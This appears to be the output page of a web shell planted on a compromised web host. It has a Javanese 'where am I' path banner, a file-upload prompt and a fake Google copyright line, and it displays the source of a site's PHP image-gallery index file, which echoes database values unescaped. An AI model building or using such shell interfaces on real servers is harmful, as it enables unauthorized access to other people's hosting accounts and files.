GOOGLE

aku nok ndi : /home/astwardha/public_html/imagegallery/
File Up :
aku nok ndi : /home/astwardha/public_html/imagegallery/index.php

<!DOCTYPE html>
    <script src="http://code.jquery.com/jquery-latest.js"></script>
    <script src="jquery.bxSlider.js"></script>
    <script type="text/javascript">
      $(document).ready(function(){
        $('#slider').bxSlider({
        ticker: true,
        tickerSpeed: 5000,
      tickerHover: true
      });
      });
    </script>
    <link href="imagegallery/style.css" rel="stylesheet">
</head>
<body>
<div class="slider-container">
  <ul id="slider">
    <?php $gallery = mysqli_query($con, "SELECT * FROM `album` ORDER BY id DESC");
         while($rows = mysqli_fetch_array($gallery)){?>
           
    <li><a href="gallery.php"><img src="uploadedImage/gallery/<?php echo $rows['thumb'];?>" class="img-thumbnail"> <h3 style="color: black;"><?php echo $rows['title'];?></h3></a>

      </li>
    <?php } ?>
  </ul>
</div>
</body>
</html>

Copyright © 1945 - 2024 GOOGLE